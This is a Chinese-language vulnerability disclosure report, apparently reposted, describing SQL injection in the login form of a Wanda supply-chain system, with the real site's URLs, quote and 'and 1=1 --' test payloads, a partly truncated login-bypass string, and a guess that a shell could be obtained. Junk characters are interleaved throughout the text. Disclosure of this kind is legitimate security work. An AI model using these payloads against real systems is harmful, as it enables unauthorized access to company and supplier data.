简要描述:万达某分站sql注入。敏感信息泄露。$ x: b* z5 r5 y4 {- j3 G! c7 J: r6 w
详细说明:
2 g$ E" h1 [% F! `; `) @) U万达scm系统登陆框sql注入。
' E( F s8 j, @ N) D) A4 c5 H- D: U6 S% T
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27" l' F7 Z3 \$ [3 \& b0 l- W
$ k; D7 ^9 q% z* v3 l5 y
0 E. J# e% i8 \8 s& S& s
500错误。8 h* i% B- s b7 `1 }8 O
4 |! x! R6 m" Z) H( K1 c6 }8 r" ~用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
- |6 J5 w8 Y! ?& P+ @0 ], D' @http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png8 ]' \/ k4 [) F' s) A8 P
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。), J* j, _ e- _- E) h6 ?7 G. v
经过分析,登陆验证的过程应该是:
" G7 T5 S4 P; L" S E
! s* U ]! i7 |6 N& e P0 R取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。& [0 J* ~- P1 g5 W( G6 k7 q; W$ t S
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
! |! Z; K5 c" h$ F: y! X. g( t
: |6 I# o7 D8 Y) ? yoracle数据库,存在注入点。@大连万达,你怎么看?: p2 K3 P! @2 F( X, T+ ~% Q
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png0 z/ H/ a- A, c2 R% L4 @+ j, [# A
/ P) }8 d J7 O系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
1 b2 S, x3 |- E漏洞证明:
2 K" r; {3 }; h$ z% ~2 a万达scm系统登陆框sql注入。
/ n7 w8 o& L9 I5 y5 L" @& G v
; i3 H7 ~, ^+ V3 m5 s- _1 ehttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
1 N2 p9 B$ W2 \% c
# z( k% B* ]) a0 J4 g& ]7 N7 V( V( S G, `$ G- o0 H ~ s5 u
500错误。, f* W S/ q0 J) U) F5 L
* z2 G/ ]* F- t" m; s" H2 ^用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。9 N! d8 L/ j! o; P% z' \6 `
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png( o) H" j+ n7 G- Z. O* ]1 B
& L/ v- C" P Q: d) ? `* O, i2 l2 v) e
(截图有一点问题)' d( f# R" w$ j( m- J- J+ s6 e
* S6 [/ |% W0 C$ l" z u
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
8 R% S8 L3 ?6 `
1 X4 G+ l# S3 }1 ^9 S$ f7 U- O取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
4 {$ Y7 j# Z- Y% z3 w
6 A+ D0 @; {* w$ }% y$ R; t绕过:
- `. |+ ~4 m; ]7 s* B1 L% K0 }http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=18 h* n( ]* g: u5 Y; f2 P2 J
4 x2 P$ @- d# c
. Z+ Q, \6 Z( J3 s4 K" ]/ h @oracle数据库,存在注入点。@大连万达,你怎么看?( L; y C, f& ]. E
系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。; _& C/ H5 X+ o" y, x4 {9 x& h2 ?$ D
9 |" V) L7 m) `- j& p" O" F$ Z4 H9 X) u) ~
修复方案:9 u% {7 _5 [% ~; z6 m8 Y( m
。。。
- E; e; T! w2 f( |5 ? |6 e
8 X# R& Q8 M; k: l2 G6 v% B, q, u) ^, v/ s" d' B; C: _
厂商已经确认
5 U2 Z+ i3 b- e$ Y: P2 x! I4 U8 S3 \- x8 o) K. N
[/td][/tr]
) h5 K0 U& J/ W, n& p* X[/table]' \+ W8 T% O$ G0 k) Y
8 I' U& Q7 q) m" ]% {& ~- P1 C u' U
|